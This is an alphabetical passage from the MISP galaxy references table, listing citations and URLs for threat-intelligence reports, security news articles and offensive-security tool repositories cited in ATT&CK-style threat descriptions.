GitHub. (n.d.). GitHub - meganz/MEGAsync: Easy automated syncing between your computers and your MEGA Cloud Drive. Retrieved June 22, 2023.

The tag is: misp-galaxy:references="GitHub meganz MEGAsync"

Table 13749. Table References

Links

https://github.com/meganz/MEGAsync

code_persistence_zsh

Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js. Retrieved January 11, 2021.

The tag is: misp-galaxy:references="code_persistence_zsh"

Table 13750. Table References

Links

https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js

Github PowerShell Empire

Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.

The tag is: misp-galaxy:references="Github PowerShell Empire"

Table 13751. Table References

Links

https://github.com/PowerShellEmpire/Empire

GitHub Pupy

Nicolas Verdier. (n.d.). Retrieved January 29, 2018.

The tag is: misp-galaxy:references="GitHub Pupy"

Table 13752. Table References

Links

https://github.com/n1nj4sec/pupy

GitHub random_c2_profile

threatexpress. (n.d.). GitHub random_c2_profile. Retrieved September 21, 2023.

The tag is: misp-galaxy:references="GitHub random_c2_profile"

Table 13753. Table References

Links

https://github.com/threatexpress/random_c2_profile

GitHub rsockstun

llkat. (n.d.). GitHub rsockstun. Retrieved December 14, 2023.

The tag is: misp-galaxy:references="GitHub rsockstun"

Table 13754. Table References

Links

https://github.com/llkat/rsockstun

GitHub secretsdump

fortra. (n.d.). GitHub secretsdump. Retrieved November 16, 2023.

The tag is: misp-galaxy:references="GitHub secretsdump"

Table 13755. Table References

Links

https://github.com/fortra/impacket/blob/master/examples/secretsdump.py

GitHub SharpChromium

djhohnstein. (n.d.). GitHub SharpChromium. Retrieved December 14, 2023.

The tag is: misp-galaxy:references="GitHub SharpChromium"

Table 13756. Table References

Links

https://github.com/djhohnstein/SharpChromium

GitHub SharpRoast

GhostPack. (n.d.). GitHub SharpRoast. Retrieved September 22, 2023.

The tag is: misp-galaxy:references="GitHub SharpRoast"

Table 13757. Table References

Links

https://github.com/GhostPack/SharpRoast

GitHub SILENTTRINITY March 2022

Salvati, M. (2019, August 6). SILENTTRINITY. Retrieved March 23, 2022.

The tag is: misp-galaxy:references="GitHub SILENTTRINITY March 2022"

Table 13758. Table References

Links

https://github.com/byt3bl33d3r/SILENTTRINITY

GitHub xmrig-proxy

xmrig. (n.d.). GitHub xmrig-proxy. Retrieved October 25, 2023.

The tag is: misp-galaxy:references="GitHub xmrig-proxy"

Table 13759. Table References

Links

https://github.com/xmrig/xmrig-proxy

GitHub Gitrob

Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="GitHub Gitrob"

Table 13760. Table References

Links

https://github.com/michenriksen/gitrob

FireEye DNS Hijack 2019

Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020.

The tag is: misp-galaxy:references="FireEye DNS Hijack 2019"

Table 13761. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html

McAfee Night Dragon

McAfee® Foundstone® Professional Services and McAfee Labs™. (2011, February 10). Global Energy Cyberattacks: “Night Dragon”. Retrieved February 19, 2018.

The tag is: misp-galaxy:references="McAfee Night Dragon"

Table 13762. Table References

Links

https://scadahacker.com/library/Documents/Cyber_Events/McAfee%20-%20Night%20Dragon%20-%20Global%20Energy%20Cyberattacks.pdf

GMER Rootkits

GMER. (n.d.). GMER. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="GMER Rootkits"

Table 13763. Table References

Links

http://www.gmer.net/

Gnome Remote Desktop grd-settings

Pascal Nowack. (n.d.). Retrieved September 21, 2021.

The tag is: misp-galaxy:references="Gnome Remote Desktop grd-settings"

Table 13764. Table References

Links

https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207

Gnome Remote Desktop gschema

Pascal Nowack. (n.d.). Retrieved September 21, 2021.

The tag is: misp-galaxy:references="Gnome Remote Desktop gschema"

Table 13765. Table References

Links

https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in

MITRE Trustworthy Firmware Measurement

Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.

The tag is: misp-galaxy:references="MITRE Trustworthy Firmware Measurement"

Table 13766. Table References

Links

http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research

Secureworks Gold Blackburn Mar 2022

Secureworks Counter Threat Unit. (2022, March 1). Gold Blackburn Threat Profile. Retrieved June 15, 2023.

The tag is: misp-galaxy:references="Secureworks Gold Blackburn Mar 2022"

Table 13767. Table References

Links

https://www.secureworks.com/research/threat-profiles/gold-blackburn

Secureworks GOLD CABIN

Secureworks. (n.d.). GOLD CABIN Threat Profile. Retrieved March 17, 2021.

The tag is: misp-galaxy:references="Secureworks GOLD CABIN"

Table 13768. Table References

Links

https://www.secureworks.com/research/threat-profiles/gold-cabin

McAfee Gold Dragon

Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems. Retrieved June 6, 2018.

The tag is: misp-galaxy:references="McAfee Gold Dragon"

Table 13769. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/

Cyberark Golden SAML

Reiner, S. (2017, November 21). Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="Cyberark Golden SAML"

Table 13770. Table References

Links

https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

Trustwave GoldenSpy2 June 2020

Trustwave SpiderLabs. (2020, June 26). GoldenSpy: Chapter Two – The Uninstaller. Retrieved July 23, 2020.

The tag is: misp-galaxy:references="Trustwave GoldenSpy2 June 2020"

Table 13771. Table References

Links

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/

Secureworks GOLD KINGSWOOD Threat Profile

Secureworks. (n.d.). GOLD KINGSWOOD. Retrieved October 18, 2021.

The tag is: misp-galaxy:references="Secureworks GOLD KINGSWOOD Threat Profile"

Table 13772. Table References

Links

https://www.secureworks.com/research/threat-profiles/gold-kingswood?filter=item-financial-gain

MSTIC NOBELIUM Mar 2021

Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.

The tag is: misp-galaxy:references="MSTIC NOBELIUM Mar 2021"

Table 13773. Table References

Links

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

Secureworks GOLD NIAGARA Threat Profile

CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.

The tag is: misp-galaxy:references="Secureworks GOLD NIAGARA Threat Profile"

Table 13774. Table References

Links

https://www.secureworks.com/research/threat-profiles/gold-niagara

Secureworks GOLD SOUTHFIELD

Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.

The tag is: misp-galaxy:references="Secureworks GOLD SOUTHFIELD"

Table 13775. Table References

Links

https://www.secureworks.com/research/threat-profiles/gold-southfield

Google Cloud Identity API Documentation

Google. (n.d.). Retrieved March 16, 2021.

The tag is: misp-galaxy:references="Google Cloud Identity API Documentation"

Table 13776. Table References

Links

https://cloud.google.com/identity/docs/reference/rest

GCPBucketBrute

Spencer Gietzen. (2019, February 26). Google Cloud Platform (GCP) Bucket Enumeration and Privilege Escalation. Retrieved March 4, 2022.

The tag is: misp-galaxy:references="GCPBucketBrute"

Table 13777. Table References

Links

https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/

ExploitDB GoogleHacking

Offensive Security. (n.d.). Google Hacking Database. Retrieved October 23, 2020.

The tag is: misp-galaxy:references="ExploitDB GoogleHacking"

Table 13778. Table References

Links

https://www.exploit-db.com/google-hacking-database

Google Workspace Global Access List

Google. (n.d.). Retrieved March 16, 2021.

The tag is: misp-galaxy:references="Google Workspace Global Access List"

Table 13779. Table References

Links

https://support.google.com/a/answer/166870?hl=en

Sophos Gootloader

Szappanos, G. & Brandt, A. (2021, March 1). “Gootloader” expands its payload delivery options. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="Sophos Gootloader"

Table 13780. Table References

Links

https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/

Unit 42 CARROTBAT January 2020

McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020.

The tag is: misp-galaxy:references="Unit 42 CARROTBAT January 2020"

Table 13781. Table References

Links

https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/

Secureworks BRONZE SILHOUETTE May 2023

Counter Threat Unit Research Team. (2023, May 24). Chinese Cyberespionage Group BRONZE SILHOUETTE Targets U.S. Government and Defense Organizations. Retrieved July 27, 2023.

The tag is: misp-galaxy:references="Secureworks BRONZE SILHOUETTE May 2023"

Table 13782. Table References

Links

https://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-government-and-defense-organizations

FireEye HAWKBALL Jun 2019

Patil, S. and Williams, M. (2019, June 5). Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities. Retrieved June 20, 2019.

The tag is: misp-galaxy:references="FireEye HAWKBALL Jun 2019"

Table 13783. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html

CISA AA20-296A Berserk Bear December 2020

CISA. (2020, December 1). Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets. Retrieved December 9, 2021.

The tag is: misp-galaxy:references="CISA AA20-296A Berserk Bear December 2020"

Table 13784. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa20-296a#revisions

Obscuresecurity Get-GPPPassword

Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Obscuresecurity Get-GPPPassword"

Table 13785. Table References

Links

https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html

Microsoft gpresult

Microsoft. (2017, October 16). gpresult. Retrieved August 6, 2021.

The tag is: misp-galaxy:references="Microsoft gpresult"

Table 13786. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult

Gpscript.exe - LOLBAS Project

LOLBAS. (2018, May 25). Gpscript.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Gpscript.exe - LOLBAS Project"

Table 13787. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Gpscript/

ESET Grandoreiro April 2020

ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020.

The tag is: misp-galaxy:references="ESET Grandoreiro April 2020"

Table 13788. Table References

Links

https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/

IBM Grandoreiro April 2020

Abramov, D. (2020, April 13). Grandoreiro Malware Now Targeting Banks in Spain. Retrieved November 12, 2020.

The tag is: misp-galaxy:references="IBM Grandoreiro April 2020"

Table 13789. Table References

Links

https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/

AWS PassRole

AWS. (n.d.). Granting a user permissions to pass a role to an AWS service. Retrieved July 10, 2023.

The tag is: misp-galaxy:references="AWS PassRole"

Table 13790. Table References

Links

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html

CopyFromScreen .NET

Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved March 24, 2020.

The tag is: misp-galaxy:references="CopyFromScreen .NET"

Table 13791. Table References

Links

https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8

Talos GravityRAT

Mercer, W., Rascagneres, P. (2018, April 26). GravityRAT - The Two-Year Evolution Of An APT Targeting India. Retrieved May 16, 2018.

The tag is: misp-galaxy:references="Talos GravityRAT"

Table 13792. Table References

Links

https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html

FireEye PowerShell Logging

Dunwoody, M. (2016, February 11). Greater Visibility Through PowerShell Logging. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="FireEye PowerShell Logging"

Table 13793. Table References

Links

https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html

FireEye PowerShell Logging 2016

Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016.

The tag is: misp-galaxy:references="FireEye PowerShell Logging 2016"

Table 13794. Table References

Links

https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html

Glitch-Cat Green Lambert ATTCK Oct 2021

Sandvik, Runa. (2021, October 18). Green Lambert and ATT&CK. Retrieved March 21, 2022.

The tag is: misp-galaxy:references="Glitch-Cat Green Lambert ATTCK Oct 2021"

Table 13795. Table References

Links

https://www.glitch-cat.com/blog/green-lambert-and-attack

ESET GreyEnergy Oct 2018

Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.

The tag is: misp-galaxy:references="ESET GreyEnergy Oct 2018"

Table 13796. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf

GRIZZLY STEPPE JAR

Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.

The tag is: misp-galaxy:references="GRIZZLY STEPPE JAR"

Table 13797. Table References

Links

https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf

Citizen Lab Group5

Scott-Railton, J., et al. (2016, August 2). Group5: Syria and the Iranian Connection. Retrieved September 26, 2016.

The tag is: misp-galaxy:references="Citizen Lab Group5"

Table 13798. Table References

Links

https://citizenlab.ca/2016/08/group5-syria/

Group-IB Threat Intelligence Tweet October 9 2023

GroupIB_TI. (2023, October 9). Group-IB Threat Intelligence Tweet October 9 2023. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="Group-IB Threat Intelligence Tweet October 9 2023"

Table 13799. Table References

Links

https://twitter.com/GroupIB_TI/status/1711234869060358562

TechNet Group Policy Basics

srachui. (2012, February 13). Group Policy Basics – Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019.

The tag is: misp-galaxy:references="TechNet Group Policy Basics"

Table 13800. Table References

Links

https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/

Microsoft GPP 2016

Microsoft. (2016, August 31). Group Policy Preferences. Retrieved March 9, 2020.

The tag is: misp-galaxy:references="Microsoft GPP 2016"

Table 13801. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)

Venafi SSH Key Abuse

Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24, 2020.

The tag is: misp-galaxy:references="Venafi SSH Key Abuse"

Table 13802. Table References

Links

https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities

Wikibooks Grsecurity

Wikibooks. (2018, August 19). Grsecurity/The RBAC System. Retrieved June 4, 2020.

The tag is: misp-galaxy:references="Wikibooks Grsecurity"

Table 13803. Table References

Links

https://en.wikibooks.org/wiki/Grsecurity/The_RBAC_System

TrueSec Gsecdump

TrueSec. (n.d.). gsecdump v2.0b5. Retrieved September 29, 2015.

The tag is: misp-galaxy:references="TrueSec Gsecdump"

Table 13804. Table References

Links

https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5

GTFOBins Suid

Emilio Pinna, Andrea Cardaci. (n.d.). GTFOBins. Retrieved January 28, 2022.

The tag is: misp-galaxy:references="GTFOBins Suid"

Table 13805. Table References

Links

https://gtfobins.github.io/+suid

GTFObins at

Emilio Pinna, Andrea Cardaci. (n.d.). gtfobins at. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="GTFObins at"

Table 13806. Table References

Links

https://gtfobins.github.io/gtfobins/at/

Fortinet Moses Staff February 15 2022

Rotem Sde-Or. (2022, February 15). Guard Your Drive from DriveGuard: Moses Staff Campaigns Against Israeli Organizations Span Several Months. Retrieved October 23, 2023.

The tag is: misp-galaxy:references="Fortinet Moses Staff February 15 2022"

Table 13807. Table References

Links

https://www.fortinet.com/blog/threat-research/guard-your-drive-from-driveguard

Unit 42 NETWIRE April 2020

Duncan, B. (2020, April 3). GuLoader: Malspam Campaign Installing NetWire RAT. Retrieved January 7, 2021.

The tag is: misp-galaxy:references="Unit 42 NETWIRE April 2020"

Table 13808. Table References

Links

https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/

Cisco H1N1 Part 1

Reynolds, J. (2016, September 13). H1N1: Technical analysis reveals new capabilities. Retrieved September 26, 2016.

The tag is: misp-galaxy:references="Cisco H1N1 Part 1"

Table 13809. Table References

Links

http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities

Cisco H1N1 Part 2

Reynolds, J. (2016, September 14). H1N1: Technical analysis reveals new capabilities – part 2. Retrieved September 26, 2016.

The tag is: misp-galaxy:references="Cisco H1N1 Part 2"

Table 13810. Table References

Links

http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities-part-2

Wired Magecart S3 Buckets, 2019

Barrett, B. (2019, July 11). Hack Brief: A Card-Skimming Hacker Group Hit 17K Domains—and Counting. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Wired Magecart S3 Buckets, 2019"

Table 13811. Table References

Links

https://www.wired.com/story/magecart-amazon-cloud-hacks/

Wired Uber Breach

Andy Greenberg. (2017, January 21). Hack Brief: Uber Paid Off Hackers to Hide a 57-Million User Data Breach. Retrieved May 14, 2021.

The tag is: misp-galaxy:references="Wired Uber Breach"

Table 13812. Table References

Links

https://www.wired.com/story/uber-paid-off-hackers-to-hide-a-57-million-user-data-breach/

Trendmicro NPM Compromise

Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019.

The tag is: misp-galaxy:references="Trendmicro NPM Compromise"

Table 13813. Table References

Links

https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets

Data Destruction - Threat Post

Mimoso, M. (2014, June 18). Hacker Puts Hosting Service Code Spaces Out of Business. Retrieved December 15, 2020.

The tag is: misp-galaxy:references="Data Destruction - Threat Post"

Table 13814. Table References

Links

https://threatpost.com/hacker-puts-hosting-service-code-spaces-out-of-business/106761/

Salesforce zero-day in facebook phishing attack

Bill Toulas. (2023, August 2). Hackers exploited Salesforce zero-day in Facebook phishing attack. Retrieved September 18, 2023.

The tag is: misp-galaxy:references="Salesforce zero-day in facebook phishing attack"

Table 13815. Table References

Links

https://www.bleepingcomputer.com/news/security/hackers-exploited-salesforce-zero-day-in-facebook-phishing-attack/

Fortune Dragonfly 2.0 Sept 2017

Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.

The tag is: misp-galaxy:references="Fortune Dragonfly 2.0 Sept 2017"

Table 13816. Table References

Links

http://fortune.com/2017/09/06/hack-energy-grid-symantec/

Huntress API Hash

Brennan, M. (2022, February 16). Hackers No Hashing: Randomizing API Hashes to Evade Cobalt Strike Shellcode Detection. Retrieved August 22, 2022.

The tag is: misp-galaxy:references="Huntress API Hash"

Table 13817. Table References

Links

https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection

BleepingComputer Agent Tesla steal wifi passwords

Sergiu Gatlan. (2020, April 16). Hackers steal WiFi passwords using upgraded Agent Tesla malware. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="BleepingComputer Agent Tesla steal wifi passwords"

Table 13818. Table References

Links

https://www.bleepingcomputer.com/news/security/hackers-steal-wifi-passwords-using-upgraded-agent-tesla-malware/

PCMag FakeLogin

Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="PCMag FakeLogin"

Table 13819. Table References

Links

https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages

Krebs-Bazaar

Brian Krebs. (2016, October 31). Hackforums Shutters Booter Service Bazaar. Retrieved May 15, 2017.

The tag is: misp-galaxy:references="Krebs-Bazaar"

Table 13820. Table References

Links

https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/

BleepingComputer Molerats Dec 2020

Ilascu, I. (2020, December 14). Hacking group’s new malware abuses Google and Facebook services. Retrieved December 28, 2020.

The tag is: misp-galaxy:references="BleepingComputer Molerats Dec 2020"

Table 13821. Table References

Links

https://www.bleepingcomputer.com/news/security/hacking-group-s-new-malware-abuses-google-and-facebook-services/

Microsoft Hacking Team Breach

Microsoft Secure Team. (2016, June 1). Hacking Team Breach: A Cyber Jurassic Park. Retrieved March 5, 2019.

The tag is: misp-galaxy:references="Microsoft Hacking Team Breach"

Table 13822. Table References

Links

https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/

Intel HackingTeam UEFI Rootkit

Intel Security. (2005, July 16). HackingTeam’s UEFI Rootkit Details. Retrieved March 20, 2017.

The tag is: misp-galaxy:references="Intel HackingTeam UEFI Rootkit"

Table 13823. Table References

Links

http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html

TrendMicro Hacking Team UEFI

Lin, P. (2015, July 13). Hacking Team Uses UEFI BIOS Rootkit to Keep RCS 9 Agent in Target Systems. Retrieved December 11, 2015.

The tag is: misp-galaxy:references="TrendMicro Hacking Team UEFI"

Table 13824. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-uses-uefi-bios-rootkit-to-keep-rcs-9-agent-in-target-systems/

TempertonDarkHotel

Temperton, J. (2015, August 10). Hacking Team zero-day used in new Darkhotel attacks. Retrieved March 9, 2017.

The tag is: misp-galaxy:references="TempertonDarkHotel"

Table 13825. Table References

Links

https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage

FireEye Hacking FIN4 Video Dec 2014

Vengerik, B. & Dennesen, K. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved January 15, 2019.

The tag is: misp-galaxy:references="FireEye Hacking FIN4 Video Dec 2014"

Table 13826. Table References

Links

https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html

FireEye Hacking FIN4 Dec 2014

Vengerik, B. et al. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved December 17, 2018.

The tag is: misp-galaxy:references="FireEye Hacking FIN4 Dec 2014"

Table 13827. Table References

Links

https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf

Malwarebytes OSINT Leaky Buckets - Hioureas

Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating leaky buckets into your OSINT workflow. Retrieved February 14, 2022.

The tag is: misp-galaxy:references="Malwarebytes OSINT Leaky Buckets - Hioureas"

Table 13828. Table References

Links

https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/

Microsoft HAFNIUM March 2020

MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021.

The tag is: misp-galaxy:references="Microsoft HAFNIUM March 2020"

Table 13829. Table References

Links

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/

haking9 libpcap network sniffing

Luis Martin Garcia. (2008, February 1). Hakin9 Issue 2/2008 Vol 3 No.2 VoIP Abuse: Storming SIP Security. Retrieved October 18, 2022.

The tag is: misp-galaxy:references="haking9 libpcap network sniffing"

Table 13830. Table References

Links

http://recursos.aldabaknocking.com/libpcapHakin9LuisMartinGarcia.pdf

FireEye APT29

FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.

The tag is: misp-galaxy:references="FireEye APT29"

Table 13831. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf

FireEye Hancitor

Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020.

The tag is: misp-galaxy:references="FireEye Hancitor"

Table 13832. Table References

Links

https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html

NCC Group Fivehands June 2021

Matthews, M. and Backhouse, W. (2021, June 15). Handy guide to a new Fivehands ransomware variant. Retrieved June 24, 2021.

The tag is: misp-galaxy:references="NCC Group Fivehands June 2021"

Table 13833. Table References

Links

https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/

Apple Developer Doco Hardened Runtime

Apple Inc. (2021, January 1). Hardened Runtime: Manage security protections and resource access for your macOS apps. Retrieved March 24, 2021.

The tag is: misp-galaxy:references="Apple Developer Doco Hardened Runtime"

Table 13834. Table References

Links

https://developer.apple.com/documentation/security/hardened_runtime

FireEye APT34 July 2019

Bromiley, M., et al. (2019, July 18). Hard Pass: Declining APT34’s Invite to Join Their Professional Network. Retrieved August 26, 2019.

The tag is: misp-galaxy:references="FireEye APT34 July 2019"

Table 13835. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html

GitHub Hashjacking

Dunning, J. (2016, August 1). Hashjacking. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="GitHub Hashjacking"

Table 13836. Table References

Links

https://github.com/hob0/hashjacking

FireEye HawkEye Malware July 2017

Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18, 2019.

The tag is: misp-galaxy:references="FireEye HawkEye Malware July 2017"

Table 13837. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html

Specter Ops - Cloud Credential Storage

Maddalena, C. (2018, September 12). Head in the Clouds. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Specter Ops - Cloud Credential Storage"

Table 13838. Table References

Links

https://posts.specterops.io/head-in-the-clouds-bd038bb69e48

Securelist Dtrack2

KONSTANTIN ZYKOV. (2019, September 23). Hello! My name is Dtrack. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="Securelist Dtrack2"

Table 13839. Table References

Links

https://securelist.com/my-name-is-dtrack/93338/

Securelist Dtrack

Konstantin Zykov. (2019, September 23). Hello! My name is Dtrack. Retrieved January 20, 2021.

The tag is: misp-galaxy:references="Securelist Dtrack"

Table 13840. Table References

Links

https://securelist.com/my-name-is-dtrack/93338/

Help eliminate unquoted path

Mark Baggett. (2012, November 8). Help eliminate unquoted path vulnerabilities. Retrieved November 8, 2012.

The tag is: misp-galaxy:references="Help eliminate unquoted path"

Table 13841. Table References

Links

https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464

Baggett 2012

Baggett, M. (2012, November 8). Help eliminate unquoted path vulnerabilities. Retrieved December 4, 2014.

The tag is: misp-galaxy:references="Baggett 2012"

Table 13842. Table References

Links

https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464

Default VBS macros Blocking

Kellie Eickmeyer. (2022, February 7). Helping users stay safe: Blocking internet macros by default in Office. Retrieved February 7, 2022.

The tag is: misp-galaxy:references="Default VBS macros Blocking"

Table 13843. Table References

Links

https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805

Twitter CMSTP Usage Jan 2018

Carr, N. (2018, January 31). Here is some early bad cmstp.exe… Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Twitter CMSTP Usage Jan 2018"

Table 13844. Table References

Links

https://twitter.com/ItsReallyNick/status/958789644165894146

ESET Hermetic Wiper February 2022

ESET. (2022, February 24). HermeticWiper: New data wiping malware hits Ukraine. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="ESET Hermetic Wiper February 2022"

Table 13845. Table References

Links

https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine

SentinelOne Hermetic Wiper February 2022

Guerrero-Saade, J. (2022, February 23). HermeticWiper | New Destructive Malware Used In Cyber Attacks on Ukraine. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="SentinelOne Hermetic Wiper February 2022"

Table 13846. Table References

Links

https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack

Dragos Hexane

Dragos. (n.d.). Hexane. Retrieved October 27, 2019.

The tag is: misp-galaxy:references="Dragos Hexane"

Table 13847. Table References

Links

https://dragos.com/resource/hexane/

Sourceforge Heyoka 2022

Sourceforge. (n.d.). Heyoka POC Exfiltration Tool. Retrieved October 11, 2022.

The tag is: misp-galaxy:references="Sourceforge Heyoka 2022"

Table 13848. Table References

Links

https://heyoka.sourceforge.net/

Hh.exe - LOLBAS Project

LOLBAS. (2018, May 25). Hh.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Hh.exe - LOLBAS Project"

Table 13849. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Hh/

CrowdStrike BloodHound April 2018

